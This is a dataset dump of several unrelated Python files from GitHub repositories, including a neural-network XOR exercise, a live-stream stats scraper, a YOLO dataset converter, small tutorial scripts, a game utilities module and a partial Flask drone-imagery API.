Lara\n# 7° 7\n\n# Librerí­as\n# Para vectores y matrices\nimport numpy as np\n# Para graficación\nimport matplotlib.pyplot as plt\n\n# Función tangente sigmoidal\nclass TanSig:\n\tdef __call__(self, x):\n\t\treturn np.tanh(x)\n\n\tdef deriv(self,x,y):\n\t\treturn 1.0 - np.square(y)\n\n# tangente hiperbólica\ndef tanh(x):\n\tt = (np.exp(x) - np.exp(-x))/(np.exp(x)+np.exp(-x))\n\treturn t\n\n\n# Entradas\nP = np.array([[0,0,1,1],\n\t\t\t [0,1,0,1]])\n\n# Valores esperados\nT = np.array([-1,1,1,-1]) # cambiamos 0 por -1\n# Número de entrada de datos\nQ = 4\n# Número de neuronas\nn1 = 34\n# Epsilon: rango de valores iniciales\nep = 1 # parámetro que afectará a W y b iniciales\n\n# Matriz de pesos sinápticos 1\nW1 = ep*2*np.random.rand(n1,2)-1\n# Vector de polarización 1\nb1 = ep*2*np.random.rand(n1,1)-1\n\n# Matriz de pesos sinápticos 2\nW2 = ep*2*np.random.rand(1,n1)-1\n# Vector de polarización 2\nb2 = ep*2*np.random.rand(1,1)-1\n\ntotal_epocas = 11000\na2 = np.array(np.zeros((1,Q)))\nerror_cuadratico_medio = np.array(np.zeros((1,total_epocas)))\nalpha = 0.001\n\nfor epocas in range(total_epocas):\n\tsum_error = 0\n\tfor q in range(Q):\n\t\t# Progagación de la entrada a la salida\n\t\ta1 = tanh(np.dot(W1,P[:,q].reshape(-1,1))+b1)\n\t\ta2[:,q] = tanh(np.dot(W2,a1)+b2)\n\n\t\t# Retropropagación de la sensibilidad\n\t\te = T[q]-a2[:,q]\n \n\t\t# Sensibilidad 2\n\t\ts2 = -2*(1-(a2[:,q]**2))*e\n \n\t\t# Sensibilidad 1\n\t\ts1 = (np.diag(1-(a1**2))*W2.T)*s2\n \n\t\t# Actualización de pesos sinapticos (W) y vectores de polarización (b)\n\t\tW2 = W2 - alpha*s2*a1.T\n\t\tb2 = b2 - alpha*s2\n\t\tW1 = W1 - alpha*s1*P[:,q].reshape(-1,1).T\n\t\tb1 = b1 - alpha*s1\n \n\t\t# error cuadrático medio\n\t\tsum_error = e**2 + sum_error\n \n\terror_cuadratico_medio[:,epocas] = sum_error/Q\n\n# Error cuadrático medio\nprint(f\"EQM: {error_cuadratico_medio}\")\n\na_verificacion = np.array(np.zeros((1,Q)))\n\n# Verificamos el resultado\nfor q in range(Q):\n\ta_verificacion[:,q] = tanh(np.dot(W2,tanh(np.dot(W1,P[:,q].reshape(-1,1))+b1))+b2)\n\nprint(f\"Valores esperados: {T}\")\nprint(f\"Valores de NN: {a_verificacion}\")\n\n# Frontera de decisión\n# Gráfica de contorno\nu = np.linspace(-2,2,100)\nv = np.linspace(-2,2,100)\nz = np.array(np.zeros((100,100)))\n\nfor i in range(100):\n\tfor j in range(100):\n\t\tz[i,j] = tanh(np.dot(W2,(tanh(np.dot(W1,[[u[i]],[v[j]]])+b1)))+b2)\n\nx = np.arange(0,total_epocas,1)\n\nfig,(ax1,ax2) = plt.subplots(1,2)\n\nax1.set_title('Error cuadrático medio')\nax1.plot(x,error_cuadratico_medio.reshape(-1,1))\nax1.set(xlabel='#épocas',ylabel='Error')\n\nax2.set_title('Compuerta lógica XOR')\nax2.contour(u, v, z.T, 5, linewidths = np.arange(-0.9, 0, 0.9))\nax2.scatter(P[0][0],P[1][0], marker='o')\nax2.scatter(P[0][1],P[1][1], marker='o')\nax2.scatter(P[0][2],P[1][2], marker='o')\nax2.scatter(P[0][3],P[1][3], marker='o')\n\n# Límites de los ejes\nax2.set_xlim([-0.5,1.5])\nax2.set_ylim([-0.5,1.5])\n\nplt.show()\n","repo_name":"JYMCL98/Git-Inteligencia-Artificial","sub_path":"Practicas/P6.py","file_name":"P6.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23061565743","text":"# -*- coding: utf-8 -*-\n##__author__ =='liam'\n# python3.52\nimport re,time,random\nimport requests,json\nimport tkinter as tk\nfrom tkinter import filedialog\nimport xlsxwriter as wx\nfrom lxml import etree\n\nUSER_AGENTS = [\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\",\n \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n]\n\nHeaders = {\n # \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"User-Agent\": random.choice(USER_AGENTS)\n}\n\ndef huajiao_get_live_status(url):\n\n xml = requests.get(url,headers = Headers,timeout = 10)\n xml = xml.content.decode('utf-8', 'replace').encode('utf8', 'replace')\n roomId = (re.search('com/user/(\\d+)',url).group(1),0)[re.search('com/user/(\\d+)',url) == None]\n xml = etree.HTML(xml)\n fansNum = xml.xpath('.//ul[@class=\"clearfix\"]/li/p')[1].xpath('string(.)').strip()\n jsonUrl = \"http://webh.huajiao.com/User/getUserFeeds?fmt=jsonp&uid=\"+str(roomId)+\"&_callback=jQuery&_=\"\n jsonXml = requests.get(jsonUrl,headers = Headers,timeout = 10).text\n jsonXml = jsonXml.replace('/**/jQuery(','').replace('});','}')\n jsonXml = json.loads(jsonXml)\n if jsonXml[\"errno\"] == 0:\n videoXML = jsonXml[\"data\"][\"feeds\"]\n for video in videoXML:\n get_Each_video(video,fansNum,roomId,url)\n \ndef get_Each_video(xml,fansNum,roomId,url):\n global LiveData\n userName = xml[\"author\"][\"nickname\"]\n onlineNum = xml[\"feed\"][\"watches\"]\n cateName = str(xml[\"feed\"][\"tags\"])\n roomName = xml[\"feed\"][\"title\"]\n videoDate = xml[\"feed\"][\"publishtime\"]\n numOfReplies = xml[\"feed\"][\"replies\"]\n numOfPraises = xml[\"feed\"][\"praises\"]\n\n info = [videoDate,roomId,userName,onlineNum,cateName,fansNum,numOfPraises,numOfReplies,roomName,url]\n LiveData.append(info)\n\ndef getExcel(data):\n try:\n print(data)\n\n title = ['DateTime', 'roomId', 'userName', 'onlineNum','cateName', 'fansNum', 'numOfPraises','numOfReplies', 'roomName','url']\n file_name = 'Output_Huajiao'+ str((time.time() * 1000))[8:]\n\n workbook = wx.Workbook(file_name + '.xlsx')\n worksheet = workbook.add_worksheet('info')\n for i in range(len(data)):\n for j in range(len(title)):\n if i == 0:\n worksheet.write(i, j, title[j])\n worksheet.write(i + 1, j, data[i][j])\n\n workbook.close()\n print('\\n File ' + file_name + ' Done!')\n except Exception as err:\n print(err)\n\n\ndef main():\n print('*' * 40)\n print('## Python 3.52')\n print('## Author Liam')\n print('## Date 02/28/2017')\n print('## Huajiao Online Data')\n print('*' * 40)\n\n print('\\r\\n请选择账户信息文件')\n dialog = tk.Tk()\n dialog.withdraw()\n filename = filedialog.askopenfilename()\n if filename is None or filename == '':\n sys.exit(0)\n # filename = './test.txt'\n print(filename)\n f = open(filename, 'rb')\n task_lines = [i for i in f.readlines()]\n f.close()\n\n global LiveData\n LiveData = []\n count = 0\n try:\n for line in task_lines:\n try:\n count += 1\n line = str(line, encoding='utf-8')\n line = line.strip()\n if not line and re.search('.*?huajiao.*?',line):\n continue\n\n huajiao_get_live_status(line)\n waitTime = random.uniform(2, 4)\n time.sleep(waitTime)\n except Exception as err:\n print(err)\n getExcel(LiveData)\n except Exception as err:\n print(err)\n finally:\n print(\"Done\")\n\nif __name__ == '__main__':\n main()","repo_name":"LiamBao/Spiders","sub_path":"LivePlatformIndex/HuajiaoOnlineCount.py","file_name":"HuajiaoOnlineCount.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70480568254","text":"\"\"\"Script to covert a yolo formated dataset into a folder like structured dataset for classification\"\"\"\nimport argparse\nimport os\nimport shutil\nimport yaml\nfrom typing import Dict\n\n\ndef cli():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\",\n \"--input\",\n help=\"input directory to read data from.\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"output directory to save processed data.\",\n type=str,\n required=True,\n )\n return parser.parse_args()\n\n\ndef get_class_names(path):\n with open(os.path.join(path, \"data.yaml\"), \"r\") as f:\n cfg = yaml.safe_load(f)\n return {i: c for i, c in enumerate(cfg[\"names\"])}\n\n\ndef move_images(input_dir: str, output_dir: str, class_names: Dict[int, str]):\n for file in os.listdir(os.path.join(input_dir, \"labels\")):\n with open(os.path.join(input_dir, \"labels\", file), \"r\") as f:\n for line in f.readlines():\n image_file = file[:-3] + \"jpg\"\n src = os.path.join(input_dir, \"images\", image_file)\n class_name = class_names[int(line[0])]\n if not os.path.exists(os.path.join(output_dir, class_name)):\n os.mkdir(os.path.join(output_dir, class_name))\n dst = os.path.join(output_dir, class_name, image_file)\n shutil.copy(src=src, dst=dst)\n\n\ndef main(input_dir: str, output_dir: str):\n # create output dirs\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n class_names = get_class_names(input_dir)\n\n for dir in os.listdir(os.path.join(input_dir)):\n # for dir in os.walk(os.path.join(input_dir)):\n input_subdir = os.path.join(input_dir, dir)\n if os.path.isdir(input_subdir) and dir in [\"train\", \"valid\", \"test\"]:\n output_subdir = os.path.join(output_dir, dir)\n if not os.path.exists(output_subdir):\n os.mkdir(output_subdir)\n move_images(input_subdir, output_subdir, class_names)\n\n\nif __name__ == \"__main__\":\n args = cli()\n\n print(f\"Converting dataset from {args.input}\")\n main(args.input, args.output)\n print(f\"Saving dataset to {args.output}\")\n","repo_name":"sumitkumarjethani/fall-detection","sub_path":"scripts/convert_yolo_dataset.py","file_name":"convert_yolo_dataset.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"73096351935","text":"'''\r\n작성일 : 2023년 9월 27일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395001\r\n이름 : 구민수\r\n설명 : 터틀 그래픽으로 n각형 도형\r\n 사용자로부터 그리고싶은 도형의 변의 수를 입력받아 도형을 그린다.\r\n'''\r\nimport turtle as t\r\n\r\nt.shape(\"turtle\")\r\n\r\n#팬 이동 - 펜 자국이 남지 않도록 들어서 이동\r\nt.penup()\r\nt.goto(-50, -50)\r\nt.pendown() # 이동을 마치면 팬 다운\r\n\r\n#원하는 도형을 입력받는다.\r\n \r\nfor i in range(5):\r\n pel = int(t.textinput('도형그리기', '몇각형의 도형을 그릴까요? : '))\r\n \r\n for i in range(pel):\r\n t.forward(50)\r\n t.left(360/pel)","repo_name":"westerdif/Data_science","sub_path":"Data_Science_Kms/Chapter5/05_lab_2.py","file_name":"05_lab_2.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23630750921","text":"# -- encoding:utf-8 --\n\n\"\"\"\n文件名:04_Variables2\n日期:Danycym\n作者:2019/5/5\n\"\"\"\n\nimport tensorflow as tf\n\n# 创建一个变量\nw1 = tf.Variable(tf.random_normal([10], stddev=0.5, dtype=tf.float32), name='w1')\n# 基于第一个变量创建第二个变量\na = tf.constant(2, dtype=tf.float32)\nw2 = tf.Variable(w1.initialized_value() * a, name='w2')\n\n# 进行全局初始化\ninit_op = tf.initialize_all_variables()\n\n# 启动图\nwith tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # 运行init_op\n sess.run(init_op)\n\n # 获取值\n #result = sess.run([w1, w2])\n result = sess.run(fetches=[w1, w2])\n print(\"w1 = {}\\nw2 = {}\".format(result[0], result[1]))\n","repo_name":"Day-yong/Tensorflow_study","sub_path":"Tensorflow-basic/05_Variables2.py","file_name":"05_Variables2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34880185661","text":"from common.globals import project, zone, dnszone, ds_client, compute, SERVER_STATES, SERVER_ACTIONS, PUBSUB_TOPICS\nfrom google.cloud import pubsub_v1\nimport time\n\ndef nuke_rebuild_server(server_name):\n pubsub_topic = PUBSUB_TOPICS.MANAGE_SERVER\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, pubsub_topic)\n future = publisher.publish(topic_path, data=b'Server Delete', server_name=server_name,\n action=SERVER_ACTIONS.DELETE)\n print(future.result())\n time.sleep(30)\n pubsub_topic = PUBSUB_TOPICS.MANAGE_SERVER\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, pubsub_topic)\n future = publisher.publish(topic_path, data=b'Server Build', server_name=server_name, action=SERVER_ACTIONS.BUILD)","repo_name":"emerginganalytics/cyberarena","sub_path":"admin_scripts/nuke_rebuild_server.py","file_name":"nuke_rebuild_server.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"55331316843","text":"import uuid\nimport base64\nfrom typing import Optional\n\nparamHelp = {\n\"CUTSCENEPROJECT\": (\"Create a New Project\", \"Edit Project\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"author\", \"Author\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"genre\", \"Genre\", \"shortStr\")]),\n\"LEVEL\": (\"Add Level\", \"Edit Level\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"SUBLEVEL\": (\"Add Sublevel\", \"Add Sublevel\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"SCENE\": (\"Add Scene\", \"Edit Scene\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"img\", \"Map\", \"mapImg\")]),\n\"CHARACTER\": (\"Create Character\", \"Edit Character\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"entityType\", \"Character Type\", [\"PLAYER\", \"ENEMY\", \"OTHER\"]),\n (\"img\", \"Character Image\", \"charImg\")]),\n\"OBJECT\": (\"Create Object\", \"Edit Object\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\"),\n (\"entityType\", \"Object Type\", [\"RESPONSIVE\", \"NON-RESPONSIVE\"]),\n (\"img\", \"Object Image\", \"charImg\")]),\n\"ACTION\": (\"Add Action\", \"Edit Action\",\n [(\"description\", \"Description\", \"Str\")]),\n\"ANIMATION\": (\"Create Animation\", \"Edit Animation\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"TRANSITION\": (\"Add Transistion\", \"Edit Transistion\",\n [(\"description\", \"Description\", \"Str\")]),\n\"ACT\": (\"Add Act\", \"Edit Act\",\n [(\"description\", \"Description\", \"Str\")]),\n\"HEADING\": (\"Add Heading\", \"Edit Heading\",\n [(\"description\", \"Description\", \"Str\")]),\n\"DIALOGUE\": (\"Add Dialogue\", \"Edit Dialogue\",\n [(\"character_name\", \"Character\", \"shortStr\"),\n (\"dialogue\", \"Dialogue\", \"Str\"),\n (\"paranthetical\", \"Paranthetical\", \"Str\")]),\n\"EVENT\": (\"Create Event\", \"Edit Event\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"OBJECTIVE\": (\"Add Objective\", \"Edit Objective\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"description\", \"Description\", \"Str\")]),\n\"PHYSICS\": (\"Add Physics\", \"Edit Physics\",\n [(\"description\", \"Description\", \"Str\")]),\n\"PSEUDOCODE\": (\"Add Pseudocode\", \"Edit Pseudocode\",\n [(\"name\", \"Name\", \"shortStr\"),\n (\"purpose\", \"Purpose\", \"Str\"),\n (\"pscode\", \"Pseudocode\", \"Str\")]),\n\"CONTROL\": (\"Add Control\", \"Edit Control\", []),\n\"SIGNAL\": (\"Add Physics\", \"Edit Physics\", []),\n}\n\n# Global registry, all instantiable items with an ID give their id and a reference to themselves into this dict\nglobal REGISTRY\nREGISTRY = {}\n\nclass OrderedInstanceHolder(object):\n \"\"\" Helper class for classes that need to store instances in a specific order.\n classes that use this (not limited to): LevelWrapper, Animation, Scene\n\n init:\n None\n\n methods:\n get: get a list of the instances\n addNew: add a new instance to the end of the list\n item: instance to add to the list\n remove: remove instance from list at a given index\n index: int\n moveUp: move instance at index one place up the list\n index: int\n moveDown: move instance at index one place down the list\n index: int\n move: move instance from one index to another\n index: int, which item you want\n newIndex: int, where you want the item to go\n \"\"\"\n\n def __init__(self):\n self.__ordered_holder = []\n\n def get(self) -> list:\n return self.__ordered_holder\n\n def addNew(self, item):\n self.__ordered_holder.append(item)\n\n def remove(self,\n index: int):\n assert type(index) is int\n del self.__ordered_holder[index]\n\n def removeByID(self,\n itemID: int):\n assert type(itemID) is int\n for index, item in enumerate(self.__ordered_holder):\n if item.id == itemID: \n self.remove(index)\n break\n\n def __elementSwap(self,\n index1: int,\n index2: int):\n \"\"\"Elementwise swap of two items at specified indexes\"\"\"\n self.__ordered_holder[index1], self.__ordered_holder[index2] = self.__ordered_holder[index2], self.__ordered_holder[index1]\n\n def moveUp(self,\n index: int):\n assert type(index) is int\n if index == 0:\n raise ValueError(\"Can't move first element of list up\")\n elif 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n self.__elementSwap(index, index-1)\n\n def moveDown(self,\n index: int):\n assert type(index) is int\n if index == len(self.__ordered_holder):\n raise ValueError(\"Can't move last element of list down\")\n elif 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n self.__elementSwap(index, index+1)\n\n def move(self,\n index: int,\n newIndex: int):\n assert type(index) is int\n assert type(newIndex) is int\n if 0 > index > len(self.__ordered_holder):\n raise ValueError(\"Index out of range: {}\".format(Index))\n if 0 > newIndex > len(self.__ordered_holder)-1:\n raise ValueError(\"newIndex out of range: {}\".format(newIndex))\n item = self.__ordered_holder.pop(index)\n self.__ordered_holder.insert(newIndex, item)\n\nclass Image(object):\n \"\"\" Base class for image support. Stores image data as base64 encoded strings \"\"\"\n def __init__(self,\n img: Optional[str] = None):\n self.img = img\n\n @property\n def img(self) -> str:\n return self.__img\n\n @img.setter\n def img(self, img: str):\n try:\n if not img:\n self.__img = None\n return\n if type(img) is bytes:\n img = img.decode(\"utf-8\")\n base64.b64decode(img)\n assert type(img) is str\n self.__img = img\n except:\n raise\n\nclass CharacterImage(Image):\n def __init__(self, img):\n Image.__init__(self, img)\n\nclass MapImage(Image):\n def __init__(self, img):\n Image.__init__(self, img)\n\nclass Name(object):\n \"\"\"Helper class providing name functionality to other classes\"\"\"\n def __init__(self,\n name: str):\n self.name = name\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, name: str):\n assert type(name) is str\n self.__name = name\n\nclass Description(object):\n \"\"\"Helper class providing description functionality to other classes\"\"\"\n def __init__(self,\n description: str):\n self.description = description\n\n @property\n def description(self) -> str:\n return self.__description\n\n @description.setter\n def description(self, description: str):\n assert type(description) is str\n self.__description = description\n\nclass NameDescription(Description, Name):\n \"\"\"Helper class providing name and description functionality to other classes\"\"\"\n def __init__(self, \n name: str,\n description: str):\n Description.__init__(self, description)\n Name.__init__(self, name)\n\nclass Instantiable(object):\n \"\"\"Base class for all instantiable objects, providing core functionality\"\"\"\n def __init__(self, itemID, parentID=None, parent=None):\n if not itemID:\n self.itemID = uuid.uuid4().int\n else:\n assert type(itemID) is int\n self.itemID = itemID\n if parent:\n self.parentID = parent.id\n else:\n self.parentID = parentID\n\n self.type = objToDict(self)[\"type\"]\n\n global REGISTRY\n REGISTRY[self.itemID] = self\n\n @property\n def id(self):\n return self.itemID\n\n def edit(self, params):\n \"\"\" Allows any class to update its attributes from a dict \"\"\"\n for key, value in params.items():\n if hasattr(self, key):\n setattr(self, key, value)\n else:\n raise ValueError(\"{} has no attribute {}\".format(self, key))\n\n def dict(self):\n \"\"\"Return a nice dict of the object, including its type\"\"\"\n return objToDict(self)\n\ndef objToDict(obj):\n obj_dict = {}\n obj_dict[\"type\"] = obj.__class__.__name__.upper()\n for key, value in obj.__dict__.items():\n # eg turns \"_Description__description\" to \"description\"\n if \"__\" in key:\n obj_dict[key.split(\"__\",1)[1]] = value\n else:\n obj_dict[key] = value\n return obj_dict\n\ndef getByID(item_id):\n global REGISTRY\n try:\n return REGISTRY[item_id]\n except KeyError:\n raise\n\n\ndef restoreOrderedHolder(parent, orderedHolder):\n if not orderedHolder:\n return\n for item in orderedHolder:\n # Get the classname of the item\n item_type = item.pop(\"type\")\n # See if the item has any contents eg an animation class with dialogue, act etc\n if \"elements\" in item.keys():\n itemOrderedHolder = item.pop(\"elements\")\n elif \"ordered_holder\" in item.keys():\n itemOrderedHolder = item.pop(\"ordered_holder\")\n else:\n itemOrderedHolder = None\n # Call its parent to init a new instance\n child = parent.new(item_type.upper(), **item)\n # Recurse another level in if there's more contents to this item\n if itemOrderedHolder:\n restoreOrderedHolder(child, itemOrderedHolder)\n # restore scenematrix if item is a scene\n if item_type == \"SCENE\":\n matrix = item.pop(\"sceneMatrix\")\n child.restoreSceneMatrix(matrix)","repo_name":"amanatron/CUT-SCENE","sub_path":"CutScene/cutscene/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7374981553","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 26 11:55:06 2019\n\n@author: Usuario\n\"\"\"\n\n# Importando as bibliotecas necessárias.\nfrom os import path\n\n\n# Estabelece a pasta que contem as figuras.\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# Estabelece a pasta que contém as músicas\nsnd_dir = path.join(path.dirname(__file__), 'snd')\n\nfnt_dir = path.join(path.dirname(__file__), 'font')\n\n# Dados gerais do jogo.\nWIDTH = 480 # Largura da tela\nHEIGHT = 600 # Altura da tela\nFPS = 60 # Frames por segundo\n\n# Define algumas variáveis com as cores básicas\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\n#Estados do init_screen\nINIT = 0\nGAME = 1\nQUIT = 2\n\n","repo_name":"guishas/Asteroids","sub_path":"assets/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"250352297","text":"class Student(object):\n pass\ns=Student()\ns.name='bob'\nprint(s.name)\ndef set_age(self,age):\n self.age=age\n from types import MappingProxyType\n s.set_age=MappingProxyType(set_age,s)\n s.set_age(25)\n s.age\ndef set_score(self,score):\n self.score=score\nStudent.set_score=set_score\nclass Student(object):\n __slots__=('name','age')\ns = Student()\ns.age=100\ns.name='bob'\nclass Student(object):\n\n def get_score(self):\n return self._score\n\n def set_score(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\nclass Student(object):\n\n @property\n def score(self):\n return self._score\n\n @score.setter\n def score(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\n#@property的实现比较复杂,我们先考察如何使用。把一个getter方法变成属性,���需要加上@property就可以了,此时,@property本身又创建了另一个装饰器@score.setter,负责把一个setter方法变成属性赋值,于是,我们就拥有一个可控的属性操作:\nclass Student(object):\n\n @property\n def birth(self):\n return self._birth\n\n @birth.setter\n def birth(self, value):\n self._birth = value\n\n @property\n def age(self):\n return 2015 - self._birth\n#上面的birth是可读写属性,而age就是一个只读属性,因为age可以根据birth和当前时间计算出来","repo_name":"q57561097/text","sub_path":"dev1/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24956533646","text":"# coding=utf-8\n\nfrom datetime import datetime\nimport json\nimport shutil\nfrom StringIO import StringIO\nimport subprocess32 as subprocess\nimport os\nimport uuid\n\nfrom cachetools.func import lru_cache\nfrom celery import Celery\nfrom flask import Flask, redirect, request, send_from_directory, jsonify, url_for\nfrom flask_cors import CORS\nfrom flask_uploads import UploadSet, configure_uploads\nfrom flask_tus import tus_manager\nimport rasterio\nfrom rasterio.warp import transform_bounds\nfrom PIL import Image\nfrom werkzeug.wsgi import DispatcherMiddleware\n\n\nAPPLICATION_ROOT = os.environ.get('APPLICATION_ROOT', '')\nREDIS_URL = os.environ.get('REDIS_URL', 'redis://')\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', REDIS_URL)\nCELERY_DEFAULT_QUEUE = os.environ.get('CELERY_DEFAULT_QUEUE', 'posm-opendronemap-api')\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', REDIS_URL)\nPROJECTS_PATH = os.environ.get('PROJECTS_PATH', 'projects')\nUSE_X_SENDFILE = os.environ.get('USE_X_SENDFILE', False)\nUPLOADED_IMAGERY_DEST = os.environ.get('UPLOADED_IMAGERY_DEST', 'uploads/')\n\n# strip trailing slash if necessary\nif PROJECTS_PATH[-1] == '/':\n PROJECTS_PATH = PROJECTS_PATH[:-1]\n\n# add trailing slash if necessary\nif UPLOADED_IMAGERY_DEST[-1] != '/':\n UPLOADED_IMAGERY_DEST = UPLOADED_IMAGERY_DEST[:-1]\n\napp = Flask('posm-opendronemap-api')\nCORS(app)\napp.config['APPLICATION_ROOT'] = APPLICATION_ROOT\napp.config['USE_X_SENDFILE'] = USE_X_SENDFILE\napp.config['UPLOADED_IMAGERY_DEST'] = UPLOADED_IMAGERY_DEST\n\n# Initialize Celery\ncelery = Celery(app.name, broker=CELERY_BROKER_URL)\ncelery.conf.update({\n 'broker_url': CELERY_BROKER_URL,\n 'result_backend': CELERY_RESULT_BACKEND,\n 'task_default_queue': CELERY_DEFAULT_QUEUE,\n 'task_track_started': True,\n})\n\n# Initialize Tus\n# TODO upload to a specific project id\ntm = tus_manager(app, upload_url='/projects/upload',\n upload_folder=app.config['UPLOADED_IMAGERY_DEST'])\n\n# Initialize Flask-Uploads\nimagery = UploadSet('imagery', ('jpg', 'png'))\nconfigure_uploads(app, (imagery,))\n\n\n@tm.upload_file_handler\ndef upload_file_handler(upload_file_path, id=None, filename=None):\n if filename is None:\n filename = os.path.basename(upload_file_path)\n\n if id is None:\n id = str(uuid.uuid4())\n\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n\n if not os.path.exists(images_path):\n os.makedirs(images_path)\n\n shutil.move(upload_file_path, os.path.join(images_path, filename))\n\n return os.path.join(id, 'images', filename)\n\n\n@celery.task(bind=True)\ndef process_project(self, id):\n started_at = datetime.utcnow()\n project_path = os.path.join(PROJECTS_PATH, id)\n\n command = [\n 'python',\n 